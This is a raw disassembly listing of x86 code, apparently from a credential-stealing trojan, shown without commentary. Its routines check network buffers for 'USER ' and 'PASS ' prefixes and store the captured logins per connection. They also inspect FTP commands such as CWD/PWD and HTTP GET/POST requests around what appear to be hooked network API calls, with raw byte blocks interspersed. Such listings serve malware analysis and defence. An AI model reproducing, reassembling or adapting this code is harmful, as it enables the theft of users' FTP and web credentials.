; ---------------------------------------------------------------------------
loc_41F2CA: ; CODE XREF: .data:0041F27E�j
mov eax, [ebp+8]
call sub_41DB85
loc_41F2D2: ; CODE XREF: .data:0041F1EA�j
; .data:0041F205�j ...
push dword ptr [ebp-8]
call sub_41A83D
mov eax, [ebp-4]
pop ecx
pop edi
pop esi
pop ebx
leave
retn 0Ch
; ---------------------------------------------------------------------------
db 56h, 0BEh, 0F8h
dd 56004102h, 0FE8415FFh, 74FF0040h, 66E80824h, 83FFFFE7h
dd 7459FFF8h, 0E87FE805h, 0FF56FFFFh, 40FE8815h, 25FF5E00h
dd 40FB40h
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
push ecx
push ecx
push ebx
push esi
push edi
mov edi, offset dword_4102F8
push edi
call dword_40FE84 ; RtlEnterCriticalSection
mov ebx, [ebp+0Ch]
push ebx
call sub_41DA61
cmp eax, 0FFFFFFFFh
pop ecx
jz loc_41F3DB
mov esi, eax
imul esi, 38h
add esi, dword_4102EC
mov ecx, [esi]
test cl, 1
jz short loc_41F3A1
cmp byte ptr [ebp+8], 0
jnz short loc_41F361
push dword ptr [ebp+20h]
push dword ptr [ebp+18h]
push dword ptr [ebp+14h]
push dword ptr [ebp+10h]
jmp short loc_41F388
; ---------------------------------------------------------------------------
loc_41F361: ; CODE XREF: .data:0041F351�j
cmp byte ptr [ebp+8], 1
jz short loc_41F379
cmp byte ptr [ebp+8], 2
jz short loc_41F379
push dword ptr [ebp+20h]
push dword ptr [ebp+18h]
push 0
push 0
jmp short loc_41F388
; ---------------------------------------------------------------------------
loc_41F379: ; CODE XREF: .data:0041F365�j
; .data:0041F36B�j
mov edx, [ebp+10h]
push dword ptr [ebp+20h]
lea ecx, [edx+18h]
push ecx
push dword ptr [ecx]
push dword ptr [edx+14h]
loc_41F388: ; CODE XREF: .data:0041F35F�j
; .data:0041F377�j
push eax
call sub_41ED7D
add esp, 14h
push edi
mov esi, eax
call dword_40FE88 ; RtlLeaveCriticalSection
mov eax, esi
jmp loc_41F42E
; ---------------------------------------------------------------------------
loc_41F3A1: ; CODE XREF: .data:0041F34B�j
test cl, 2
jz short loc_41F3DB
and dword ptr [ebp-8], 0
lea eax, [ebp-4]
push eax
lea eax, [ebp-8]
push eax
push 2Dh
push ebx
mov dword ptr [ebp-4], 4
call dword_40FB64
test eax, eax
jz short loc_41F3D8
push dword ptr [ebp-4]
lea eax, [ebp-8]
push eax
push 2Dh
push dword ptr [esi+10h]
call dword_40FB8C
loc_41F3D8: ; CODE XREF: .data:0041F3C4�j
mov ebx, [esi+10h]
loc_41F3DB: ; CODE XREF: .data:0041F335�j
; .data:0041F3A4�j
push edi
call dword_40FE88 ; RtlLeaveCriticalSection
cmp byte ptr [ebp+8], 0
jnz short loc_41F3FA
push dword ptr [ebp+18h]
push dword ptr [ebp+14h]
push dword ptr [ebp+10h]
push ebx
call dword_40FB54
jmp short loc_41F42E
; ---------------------------------------------------------------------------
loc_41F3FA: ; CODE XREF: .data:0041F3E6�j
cmp byte ptr [ebp+8], 1
push dword ptr [ebp+20h]
push dword ptr [ebp+1Ch]
jnz short loc_41F412
push dword ptr [ebp+10h]
push ebx
call dword_40FB84
jmp short loc_41F42E
; ---------------------------------------------------------------------------
loc_41F412: ; CODE XREF: .data:0041F404�j
cmp byte ptr [ebp+8], 2
jnz short loc_41F424
push dword ptr [ebp+10h]
push ebx
call dword_40FB80
jmp short loc_41F42E
; ---------------------------------------------------------------------------
loc_41F424: ; CODE XREF: .data:0041F416�j
push dword ptr [ebp+18h]
push ebx
call dword_40FB7C
loc_41F42E: ; CODE XREF: .data:0041F39C�j
; .data:0041F3F8�j ...
pop edi
pop esi
pop ebx
leave
retn
; ---------------------------------------------------------------------------
db 33h
dd 0FF5050C0h, 3 dup(0FF182474h), 50182474h, 0FFFEC7E8h
dd 1CC483FFh, 0FF0010C2h, 0FF102474h, 6A102474h, 0FF006A00h
dd 0FF182474h, 6A182474h, 0FEA6E802h, 0C483FFFFh, 10C21Ch
dd 2 dup(102474FFh), 6A006Ah, 2 dup(182474FFh), 85E8016Ah
dd 83FFFFFEh, 10C21CC4h, 2474FF00h, 2 dup(2474FF10h), 6A006A10h
dd 2474FF00h, 0E8036A18h, 0FFFFFE64h, 0C21CC483h
db 10h, 0
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41F4B6 proc near ; CODE XREF: sub_41F7AC:loc_41F8B9�p
var_558 = byte ptr -558h
var_158 = byte ptr -158h
var_54 = dword ptr -54h
var_4C = byte ptr -4Ch
var_44 = dword ptr -44h
var_40 = dword ptr -40h
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_1 = byte ptr -1
push ebp
mov ebp, esp
sub esp, 558h
or [ebp+var_14], 0FFFFFFFFh
cmp byte ptr [esi+414h], 0
push ebx
push edi
jz loc_41F5D9
and [ebp+var_10], 0
lea eax, [ebp+var_10]
push eax
push 3F2h
call sub_414B1B
test eax, eax
pop ecx
pop ecx
mov [ebp+var_8], eax
jz loc_41F5D9
push eax
push [ebp+var_10]
call sub_41A1D4
test al, al
pop ecx
pop ecx
jz loc_41F5C1
mov edi, [ebp+var_10]
loc_41F507: ; CODE XREF: sub_41F4B6+A1�j
mov cl, [edi]
xor bl, bl
cmp cl, 40h
jz short loc_41F515
cmp cl, 21h
jnz short loc_41F527
loc_41F515: ; CODE XREF: sub_41F4B6+58�j
lea eax, [edi+1]
cmp byte ptr [eax], 0
jz short loc_41F549
cmp cl, 21h
setnz bl
inc bl
mov edi, eax
loc_41F527: ; CODE XREF: sub_41F4B6+5D�j
push 2
push 0
push 0
push dword ptr [esi+400h]
push esi
push edi
call dword_40FD94 ; lstrlenA
push eax
push edi
call sub_41A221
add esp, 1Ch
test al, al
jnz short loc_41F55B
loc_41F549: ; CODE XREF: sub_41F4B6+65�j
push 1
push edi
call sub_41A1FA
mov edi, eax
test edi, edi
pop ecx
pop ecx
jnz short loc_41F507
jmp short loc_41F5C1
; ---------------------------------------------------------------------------
loc_41F55B: ; CODE XREF: sub_41F4B6+91�j
xor eax, eax
cmp bl, 1
setnz al
cmp bl, 2
movzx eax, ax
mov [ebp+var_14], eax
jnz short loc_41F5C1
push 3Ch
pop edi
lea eax, [ebp+var_54]
push edi
push eax
call sub_41BE72
pop ecx
pop ecx
lea eax, [ebp+var_158]
mov [ebp+var_44], eax
lea eax, [ebp+var_54]
push eax
push 0
push dword ptr [esi+400h]
mov [ebp+var_54], edi
push esi
mov [ebp+var_40], 103h
call dword_40FB58
test eax, eax
jz short loc_41F5B5
cmp [ebp+var_40], 0
jz short loc_41F5B5
lea eax, [ebp+var_158]
jmp short loc_41F5B7
; ---------------------------------------------------------------------------
loc_41F5B5: ; CODE XREF: sub_41F4B6+EF�j
; sub_41F4B6+F5�j
xor eax, eax
loc_41F5B7: ; CODE XREF: sub_41F4B6+FD�j
push eax
push 14h
call sub_415ADE
pop ecx
pop ecx
loc_41F5C1: ; CODE XREF: sub_41F4B6+48�j
; sub_41F4B6+A3�j ...
push [ebp+var_10]
call sub_41A83D
xor ebx, ebx
cmp word ptr [ebp+var_14], bx
pop ecx
jnz short loc_41F5DB
loc_41F5D2: ; CODE XREF: sub_41F4B6+130�j
; sub_41F4B6+140�j ...
xor al, al
jmp loc_41F7A8
; ---------------------------------------------------------------------------
loc_41F5D9: ; CODE XREF: sub_41F4B6+16�j
; sub_41F4B6+35�j
xor ebx, ebx
loc_41F5DB: ; CODE XREF: sub_41F4B6+11A�j
mov eax, [esi+41Ch]
cmp eax, 0EA60h
ja short loc_41F5D2
cmp word ptr [ebp+var_14], 0FFFFh
jnz short loc_41F642
cmp byte ptr [esi+404h], 50h
jnz short loc_41F5D2
cmp eax, 5
jb short loc_41F5D2
push ebx
lea eax, [ebp+var_8]
push eax
lea eax, [ebp+var_4C]
push eax
push 80000001h
push dword ptr [esi+420h]
mov [ebp+var_8], 31h
call dword_40FB60
test eax, eax
jz short loc_41F5D2
mov eax, dword_40FB34
push 0FFFFFFFFh
push [ebp+var_8]
push dword ptr [eax+13Ch]
lea eax, [ebp+var_4C]
push eax
call sub_41A493
add esp, 10h
test eax, eax
jnz short loc_41F5D2
loc_41F642: ; CODE XREF: sub_41F4B6+137�j
mov eax, [esi+41Ch]
xor edi, edi
cmp eax, ebx
jbe short loc_41F6AD
inc eax
push eax
call sub_41A81F
mov edi, eax
cmp edi, ebx
pop ecx
jz loc_41F5D2
push dword ptr [esi+41Ch]
push dword ptr [esi+418h]
push edi
call sub_41A857
mov eax, [esi+41Ch]
add esp, 0Ch
mov byte ptr [edi+eax], 0
xor edx, edx
cmp [esi+41Ch], ebx
jbe short loc_41F6AD
xor eax, eax
loc_41F68B: ; CODE XREF: sub_41F4B6+1F5�j
add eax, edi
mov cl, [eax]
cmp cl, 26h
jnz short loc_41F699
mov byte ptr [eax], 0Ah
jmp short loc_41F6A1
; ---------------------------------------------------------------------------
loc_41F699: ; CODE XREF: sub_41F4B6+1DC�j
cmp cl, 2Bh
jnz short loc_41F6A1
mov byte ptr [eax], 20h
loc_41F6A1: ; CODE XREF: sub_41F4B6+1E1�j
; sub_41F4B6+1E6�j
inc edx
movzx eax, dx
cmp eax, [esi+41Ch]
jb short loc_41F68B
loc_41F6AD: ; CODE XREF: sub_41F4B6+196�j
; sub_41F4B6+1D1�j
cmp byte ptr [esi+4], 73h
mov [ebp+var_18], ebx
mov [ebp+var_C], ebx
jnz short loc_41F6C9
cmp byte ptr [esi+5], 3Ah
jnz short loc_41F6C9
cmp byte ptr [esi+6], 2Fh
mov [ebp+var_1], 2
jz short loc_41F6CD
loc_41F6C9: ; CODE XREF: sub_41F4B6+201�j
; sub_41F4B6+207�j
mov [ebp+var_1], 1
loc_41F6CD: ; CODE XREF: sub_41F4B6+211�j
lea eax, [ebp+var_18]
push eax
lea eax, [ebp+var_C]
push eax
call sub_415D04
cmp [ebp+var_1], 2
pop ecx
pop ecx
jnz short loc_41F707
push offset dword_4102F8
call dword_40FE84 ; RtlEnterCriticalSection
lea eax, [ebp+var_C]
push eax
push esi
lea ebx, [ebp+var_18]
call sub_41DCA5
pop ecx
pop ecx
push offset dword_4102F8
call dword_40FE88 ; RtlLeaveCriticalSection
loc_41F707: ; CODE XREF: sub_41F4B6+22A�j
push 0
lea eax, [ebp+var_8]
push eax
lea eax, [ebp+var_558]
push eax
push 80000023h
push dword ptr [esi+420h]
mov [ebp+var_8], 3FFh
call dword_40FB60
test eax, eax
jz short loc_41F737
mov eax, [ebp+var_8]
test eax, eax
jnz short loc_41F744
loc_41F737: ; CODE XREF: sub_41F4B6+278�j
xor eax, eax
inc eax
mov [ebp+var_8], eax
mov [ebp+var_558], 2Dh
loc_41F744: ; CODE XREF: sub_41F4B6+27F�j
test edi, edi
mov [ebp+eax+var_558], 0
mov ecx, offset byte_40325E
mov edx, edi
jnz short loc_41F759
mov edx, ecx
loc_41F759: ; CODE XREF: sub_41F4B6+29F�j
cmp [ebp+var_C], 0
jz short loc_41F762
mov ecx, [ebp+var_C]
loc_41F762: ; CODE XREF: sub_41F4B6+2A7�j
push edx
push ecx
lea ecx, [ebp+var_558]
push ecx
mov ecx, [esi+400h]
add ecx, [esi+41Ch]
push esi
add ecx, [ebp+var_18]
lea eax, [ecx+eax+3Ch]
push eax
mov eax, dword_40FB34
push dword ptr [eax+140h]
movzx eax, [ebp+var_1]
push eax
call sub_41CAA9
push [ebp+var_C]
call sub_41A83D
push edi
call sub_41A83D
add esp, 24h
mov al, 1
loc_41F7A8: ; CODE XREF: sub_41F4B6+11E�j
pop edi
pop ebx
leave
retn
sub_41F4B6 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41F7AC proc near ; CODE XREF: sub_41F985+44�p
; sub_41FA47+5A�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push ebx
push esi
push edi
mov esi, eax
lea edi, [esi+400h]
push edi
push esi
push 22h
push [ebp+arg_0]
mov dword ptr [edi], 3FCh
call dword_40FB64
test eax, eax
jz loc_41F97E
mov eax, [edi]
cmp eax, 8
jbe loc_41F97E
mov ebx, offset dword_4102F8
push ebx
mov byte ptr [eax+esi], 0
call dword_40FE84 ; RtlEnterCriticalSection
push dword ptr [edi]
push esi
call sub_41E26B
pop ecx
pop ecx
push ebx
call dword_40FE88 ; RtlLeaveCriticalSection
push 0
lea eax, [esi+410h]
push eax
lea ecx, [esi+404h]
push ecx
push 2Dh
push [ebp+arg_0]
mov dword ptr [eax], 9
call dword_40FB60
test eax, eax
jz loc_41F97E
mov al, [esi+404h]
cmp al, 47h
jz short loc_41F83C
cmp al, 50h
jnz loc_41F97E
loc_41F83C: ; CODE XREF: sub_41F7AC+86�j
push 1
push esi
push offset a@hj01n_1@ ; "-!-@hj01N./1@};|"
call sub_41C67A
add esp, 0Ch
test al, al
jz short loc_41F869
or dword ptr [esi+424h], 4
push 2F78h
call dword_40FE78 ; RtlSetLastWin32Error
loc_41F862: ; CODE XREF: sub_41F7AC+165�j
; sub_41F7AC+1CD�j
mov al, 1
jmp loc_41F980
; ---------------------------------------------------------------------------
loc_41F869: ; CODE XREF: sub_41F7AC+A2�j
push 0
push 0
call sub_414A0E
mov [esi+414h], al
mov eax, [ebp+arg_0]
pop ecx
pop ecx
mov ecx, [ebp+arg_8]
mov [esi+420h], eax
xor eax, eax
cmp ecx, eax
mov [esi+42Ch], eax
mov [esi+428h], eax
jz short loc_41F8AD
mov edx, [ebp+arg_4]
cmp edx, eax
jz short loc_41F8AD
mov [esi+41Ch], ecx
mov [esi+418h], edx
jmp short loc_41F8B9
; ---------------------------------------------------------------------------
loc_41F8AD: ; CODE XREF: sub_41F7AC+EA�j
; sub_41F7AC+F1�j
mov [esi+41Ch], eax
mov [esi+418h], eax
loc_41F8B9: ; CODE XREF: sub_41F7AC+FF�j
call sub_41F4B6
xor eax, eax
push eax
push eax
push eax
push dword ptr [edi]
mov eax, dword_40FB34
push esi
push dword ptr [eax+170h]
call dword_40FD94 ; lstrlenA
push eax
mov eax, dword_40FB34
push dword ptr [eax+170h]
call sub_41A221
add esp, 1Ch
test al, al
jz short loc_41F90A
push dword ptr [edi]
push esi
call sub_41BC6D
test eax, eax
pop ecx
pop ecx
jz short loc_41F90A
push eax
push offset loc_40C2C0
call sub_41B789
pop ecx
pop ecx
loc_41F90A: ; CODE XREF: sub_41F7AC+141�j
; sub_41F7AC+14F�j
cmp byte ptr [esi+414h], 0
jz loc_41F862
push ebx
call dword_40FE84 ; RtlEnterCriticalSection
push 40DC2Bh
push 0
push 0Ah
push 8
push 4
push 2
push 0Eh
push 3EFh
call sub_41E0EA
add esp, 20h
test al, al
jz short loc_41F949
or dword ptr [esi+424h], 2
jmp short loc_41F96D
; ---------------------------------------------------------------------------
loc_41F949: ; CODE XREF: sub_41F7AC+192�j
push offset sub_40D058
push 0
push 8
push 6
push 4
push 2
push 0Eh
push 4B6h
call sub_41E0EA
push esi
call sub_41E377
add esp, 24h
loc_41F96D: ; CODE XREF: sub_41F7AC+19B�j
push ebx
call dword_40FE88 ; RtlLeaveCriticalSection
call sub_414AD3
jmp loc_41F862
; ---------------------------------------------------------------------------
loc_41F97E: ; CODE XREF: sub_41F7AC+23�j
; sub_41F7AC+2E�j ...
xor al, al
loc_41F980: ; CODE XREF: sub_41F7AC+B8�j
pop edi
pop esi
pop ebx
pop ebp
retn
sub_41F7AC endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41F985 proc near ; CODE XREF: .data:0041FA1B�p
; .data:0041FA3B�p
var_434 = byte ptr -434h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
arg_0 = byte ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 434h
push ebx
push esi
xor ebx, ebx
cmp [ebp+arg_C], ebx
push edi
mov edi, eax
mov esi, ecx
jz short loc_41F9BB
cmp [ebp+arg_0], bl
mov eax, dword_40FB74
jnz short loc_41F9AB
mov eax, dword_40FB78
loc_41F9AB: ; CODE XREF: sub_41F985+1F�j
push 0A0000000h
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
call eax ; dword_40FB74
loc_41F9BB: ; CODE XREF: sub_41F985+15�j
push edi
push esi
push [ebp+arg_4]
lea eax, [ebp+var_434]
mov [ebp+var_10], ebx
call sub_41F7AC
add esp, 0Ch
test al, al
jz short loc_41F9F5
test byte ptr [ebp+var_10], 4
jz short loc_41F9DF
xor eax, eax
jmp short loc_41FA02
; ---------------------------------------------------------------------------
loc_41F9DF: ; CODE XREF: sub_41F985+54�j
test byte ptr [ebp+var_10], 2
jz short loc_41F9EA
xor eax, eax
inc eax
jmp short loc_41FA02
; ---------------------------------------------------------------------------
loc_41F9EA: ; CODE XREF: sub_41F985+5E�j
cmp [ebp+var_8], ebx
jz short loc_41F9F5
mov esi, [ebp+var_C]
mov edi, [ebp+var_8]
loc_41F9F5: ; CODE XREF: sub_41F985+4E�j
; sub_41F985+68�j
push edi
push esi
push ebx
push ebx
push [ebp+arg_4]
call dword_40FB50
loc_41FA02: ; CODE XREF: sub_41F985+58�j
; sub_41F985+63�j
pop edi
pop esi
pop ebx
leave
retn
sub_41F985 endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
push dword ptr [ebp+10h]
mov eax, [ebp+18h]
push dword ptr [ebp+0Ch]
mov ecx, [ebp+14h]
push dword ptr [ebp+8]
push 1
call sub_41F985
add esp, 10h
pop ebp
retn 14h
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
push dword ptr [ebp+10h]
mov eax, [ebp+18h]
push dword ptr [ebp+0Ch]
mov ecx, [ebp+14h]
push dword ptr [ebp+8]
push 0
call sub_41F985
add esp, 10h
pop ebp
retn 14h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41FA47 proc near ; CODE XREF: .data:0041FB03�p
; .data:0041FB20�p
var_434 = byte ptr -434h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = byte ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
sub esp, 434h
push esi
mov esi, eax
xor eax, eax
xor ecx, ecx
test esi, esi
jz short loc_41FA8C
mov edx, [esi+0Ch]
test edx, edx
jz short loc_41FA86
mov eax, [esi+8]
test eax, eax
jz short loc_41FA86
cmp [ebp+arg_0], cl
mov ecx, dword_40FB74
jnz short loc_41FA7A
mov ecx, dword_40FB78
loc_41FA7A: ; CODE XREF: sub_41FA47+2B�j
push 0A0000000h
push edx
push eax
push [ebp+arg_4]
call ecx ; dword_40FB74
loc_41FA86: ; CODE XREF: sub_41FA47+19�j
; sub_41FA47+20�j
mov eax, [esi+14h]
mov ecx, [esi+18h]
loc_41FA8C: ; CODE XREF: sub_41FA47+12�j
push ecx
push eax
push [ebp+arg_4]
lea eax, [ebp+var_434]
mov [ebp+var_10], 1
mov [ebp+var_4], esi
call sub_41F7AC
add esp, 0Ch
test al, al
jz short loc_41FACB
test byte ptr [ebp+var_10], 4
jz short loc_41FAB7
xor eax, eax
jmp short loc_41FAEA
; ---------------------------------------------------------------------------
loc_41FAB7: ; CODE XREF: sub_41FA47+6A�j
test byte ptr [ebp+var_10], 2
jz short loc_41FAC2
xor eax, eax
inc eax
jmp short loc_41FAEA
; ---------------------------------------------------------------------------
loc_41FAC2: ; CODE XREF: sub_41FA47+74�j
cmp [ebp+var_8], 28h
jnz short loc_41FACB
mov esi, [ebp+var_C]
loc_41FACB: ; CODE XREF: sub_41FA47+64�j
; sub_41FA47+7F�j
cmp [ebp+arg_0], 0
mov eax, dword_40FB6C
jnz short loc_41FADB
mov eax, dword_40FB70
loc_41FADB: ; CODE XREF: sub_41FA47+8D�j
push [ebp+arg_10]
push [ebp+arg_C]
push [ebp+arg_8]
push esi
push [ebp+arg_4]
call eax ; dword_40FB6C
loc_41FAEA: ; CODE XREF: sub_41FA47+6E�j
; sub_41FA47+79�j
pop esi
leave
retn 14h
sub_41FA47 endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
push dword ptr [ebp+18h]
mov eax, [ebp+0Ch]
push dword ptr [ebp+14h]
push dword ptr [ebp+10h]
push dword ptr [ebp+8]
push 1
call sub_41FA47
pop ebp
retn 14h
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
push dword ptr [ebp+18h]
mov eax, [ebp+0Ch]
push dword ptr [ebp+14h]
push dword ptr [ebp+10h]
push dword ptr [ebp+8]
push 0
call sub_41FA47
pop ebp
retn 14h
; =============== S U B R O U T I N E =======================================
sub_41FB29 proc near ; CODE XREF: .data:004157F0�p
and dword_41032C, 0
and dword_410328, 0
push offset dword_410310
call dword_40FE80 ; InitializeCriticalSection
retn
sub_41FB29 endp
; =============== S U B R O U T I N E =======================================
sub_41FB43 proc near ; CODE XREF: sub_41FC7E+D9�p
; sub_41FC7E+119�p ...
arg_0 = dword ptr 4
mov edx, dword_410328
push esi
xor eax, eax
test edx, edx
push edi
jbe short loc_41FB6D
mov edi, dword_41032C
mov esi, edi
loc_41FB59: ; CODE XREF: sub_41FB43+28�j
mov ecx, [esi]
cmp ecx, [esp+8+arg_0]
jnz short loc_41FB65
test ecx, ecx
jnz short loc_41FB72
loc_41FB65: ; CODE XREF: sub_41FB43+1C�j
inc eax
add esi, 0Ch
cmp eax, edx
jb short loc_41FB59
loc_41FB6D: ; CODE XREF: sub_41FB43+C�j
xor eax, eax
loc_41FB6F: ; CODE XREF: sub_41FB43+34�j
pop edi
pop esi
retn
; ---------------------------------------------------------------------------
loc_41FB72: ; CODE XREF: sub_41FB43+20�j
imul eax, 0Ch
add eax, edi
jmp short loc_41FB6F
sub_41FB43 endp
; =============== S U B R O U T I N E =======================================
sub_41FB79 proc near ; CODE XREF: sub_41FC7E+E8�p
arg_0 = dword ptr 4
mov ecx, dword_410328
mov edx, dword_41032C
xor eax, eax
test ecx, ecx
push esi
jbe short loc_41FBA4
mov esi, edx
loc_41FB8E: ; CODE XREF: sub_41FB79+20�j
cmp dword ptr [esi], 0
jz short loc_41FB9D
inc eax
add esi, 0Ch
cmp eax, ecx
jb short loc_41FB8E
jmp short loc_41FBA4
; ---------------------------------------------------------------------------
loc_41FB9D: ; CODE XREF: sub_41FB79+18�j
imul eax, 0Ch
add eax, edx
jnz short loc_41FBCF
loc_41FBA4: ; CODE XREF: sub_41FB79+11�j
; sub_41FB79+22�j
inc ecx
imul ecx, 0Ch
push ecx
push edx
call sub_41BE45
pop ecx
pop ecx
mov ecx, eax
test ecx, ecx
jnz short loc_41FBB9
pop esi
retn
; ---------------------------------------------------------------------------
loc_41FBB9: ; CODE XREF: sub_41FB79+3C�j
mov eax, dword_410328
imul eax, 0Ch
add eax, ecx
inc dword_410328
mov dword_41032C, ecx
loc_41FBCF: ; CODE XREF: sub_41FB79+29�j
mov ecx, [esp+4+arg_0]
mov [eax], ecx
pop esi
retn
sub_41FB79 endp
; =============== S U B R O U T I N E =======================================
sub_41FBD7 proc near ; CODE XREF: sub_41FC7E+F6�p
; sub_41FC7E+144�p ...
arg_0 = byte ptr 4
push ebx
push dword ptr [esi+4]
xor ebx, ebx
mov [esi], ebx
call sub_41A83D
push dword ptr [esi+8]
mov [esi+4], ebx
call sub_41A83D
cmp [esp+0Ch+arg_0], bl
pop ecx
pop ecx
mov [esi+8], ebx
jnz short loc_41FC4C
mov eax, dword_410328
cmp eax, ebx
jbe short loc_41FC4C
mov ecx, dword_41032C
mov edx, eax
imul edx, 0Ch
lea edx, [edx+ecx-0Ch]
cmp esi, edx
jnz short loc_41FC4C
cmp eax, 1
jnz short loc_41FC30
push ecx
call sub_41A83D
pop ecx
mov dword_41032C, ebx
mov dword_410328, ebx
pop ebx
retn
; ---------------------------------------------------------------------------
loc_41FC30: ; CODE XREF: sub_41FBD7+42�j
dec eax
imul eax, 0Ch
push eax
push ecx
call sub_41BE45
cmp eax, ebx
pop ecx
pop ecx
jz short loc_41FC4C
dec dword_410328
mov dword_41032C, eax
loc_41FC4C: ; CODE XREF: sub_41FBD7+21�j
; sub_41FBD7+2A�j ...
pop ebx
retn
sub_41FBD7 endp
; ---------------------------------------------------------------------------
dw 0BF57h
dd offset dword_410310
dd 8415FF57h, 0FF0040FEh, 0E8082474h, 0FFFFFEDFh, 7459C085h
dd 6A560Ch, 64E8F08Bh, 59FFFFFFh, 15FF575Eh, 40FE88h
db 5Fh, 0C3h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41FC7E proc near ; CODE XREF: .data:00420003�p
; .data:0042001E�p ...
var_18 = byte ptr -18h
var_16 = word ptr -16h
var_14 = byte ptr -14h
var_13 = byte ptr -13h
var_12 = byte ptr -12h
var_11 = byte ptr -11h
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 18h
push ebx
mov ebx, [ebp+arg_8]
cmp ebx, 3
jb loc_41FFD4
push esi
push edi
mov edi, [ebp+arg_4]
xor esi, esi
cmp edi, esi
jz loc_41FFD2
cmp [ebp+arg_0], esi
jz loc_41FFD2
mov al, [edi]
cmp al, 55h
mov [ebp+var_4], esi
jnz short loc_41FCCF
cmp byte ptr [edi+1], 53h
jnz short loc_41FCCF
cmp byte ptr [edi+2], 45h
jnz short loc_41FCCF
cmp byte ptr [edi+3], 52h
jnz short loc_41FCCF
cmp byte ptr [edi+4], 20h
jnz short loc_41FCCF
push 5
pop esi
jmp short loc_41FD06
; ---------------------------------------------------------------------------
loc_41FCCF: ; CODE XREF: sub_41FC7E+32�j
; sub_41FC7E+38�j ...
cmp al, 50h
jnz loc_41FDED
cmp byte ptr [edi+1], 41h
jnz loc_41FDED
cmp byte ptr [edi+2], 53h
jnz loc_41FDED
cmp byte ptr [edi+3], 53h
jnz loc_41FDED
cmp byte ptr [edi+4], 20h
jnz loc_41FDED
mov [ebp+var_4], 5
loc_41FD06: ; CODE XREF: sub_41FC7E+4F�j
mov eax, ebx
sub eax, esi
mov [ebp+var_8], eax
inc eax
push eax
call sub_41A81F
mov edx, eax
test edx, edx
pop ecx
mov [ebp+arg_8], edx
jz loc_41FFD2
test esi, esi
mov ecx, esi
jnz short loc_41FD40
mov ecx, [ebp+var_4]
jmp short loc_41FD40
; ---------------------------------------------------------------------------
loc_41FD2D: ; CODE XREF: sub_41FC7E+C4�j
mov al, [ecx+edi]
cmp al, 0Ah
jz short loc_41FD3E
cmp al, 0Dh
jz short loc_41FD3E
test al, al
jz short loc_41FD3E
mov [edx], al
loc_41FD3E: ; CODE XREF: sub_41FC7E+B4�j
; sub_41FC7E+B8�j ...
inc ecx
inc edx
loc_41FD40: ; CODE XREF: sub_41FC7E+A8�j
; sub_41FC7E+AD�j
cmp ecx, ebx
jb short loc_41FD2D
mov edi, offset dword_410310
push edi
call dword_40FE84 ; RtlEnterCriticalSection
test esi, esi
jz short loc_41FD8E
push [ebp+arg_0]
call sub_41FB43
mov esi, eax
test esi, esi
pop ecx
jnz short loc_41FD72
push [ebp+arg_0]
call sub_41FB79
mov esi, eax
test esi, esi
pop ecx
jz short loc_41FDC8
loc_41FD72: ; CODE XREF: sub_41FC7E+E3�j
push 1
call sub_41FBD7
push [ebp+var_8]
mov eax, [ebp+arg_0]
push [ebp+arg_8]
mov [esi], eax
call sub_41BC6D
mov [esi+4], eax
jmp short loc_41FDBA
; ---------------------------------------------------------------------------
loc_41FD8E: ; CODE XREF: sub_41FC7E+D4�j
cmp [ebp+var_4], 0
jz short loc_41FDC8
push [ebp+arg_0]
call sub_41FB43
mov esi, eax
test esi, esi
pop ecx
jz short loc_41FDC8
push dword ptr [esi+8]
call sub_41A83D
sub ebx, [ebp+var_4]
push ebx
push [ebp+arg_8]
call sub_41BC6D
mov [esi+8], eax
loc_41FDBA: ; CODE XREF: sub_41FC7E+10E�j
add esp, 0Ch
test eax, eax
jnz short loc_41FDC8
push eax
call sub_41FBD7
pop ecx
loc_41FDC8: ; CODE XREF: sub_41FC7E+F2�j
; sub_41FC7E+114�j ...
push edi
call dword_40FE88 ; RtlLeaveCriticalSection
push [ebp+arg_8]
call sub_41A83D
pop ecx
jmp loc_41FFD2
; ---------------------------------------------------------------------------
loc_41FDDD: ; CODE XREF: sub_41FC7E+172�j
mov al, [edi+ebx-1]
cmp al, 0Dh
jz short loc_41FDE9
cmp al, 0Ah
jnz short loc_41FDF2
loc_41FDE9: ; CODE XREF: sub_41FC7E+165�j
dec ebx
mov [ebp+arg_8], ebx
loc_41FDED: ; CODE XREF: sub_41FC7E+53�j
; sub_41FC7E+5D�j ...
cmp ebx, 1
ja short loc_41FDDD
loc_41FDF2: ; CODE XREF: sub_41FC7E+169�j
lea eax, [ebx-3]
cmp eax, 1
ja loc_41FFD2
push offset dword_410310
call dword_40FE84 ; RtlEnterCriticalSection
push [ebp+arg_0]
call sub_41FB43
mov esi, eax
xor eax, eax
cmp esi, eax
pop ecx
jz loc_41FFC7
cmp [esi+4], eax
jz loc_41FFC0
cmp [esi+8], eax
jz loc_41FFC0
cmp ebx, 3
jnz short loc_41FE5E
mov al, [edi]
cmp al, 43h
jz short loc_41FE43
cmp al, 50h
jnz loc_41FFC7
loc_41FE43: ; CODE XREF: sub_41FC7E+1BB�j
cmp byte ptr [edi+1], 57h
jnz loc_41FFC7
cmp byte ptr [edi+2], 44h
jnz loc_41FFC7
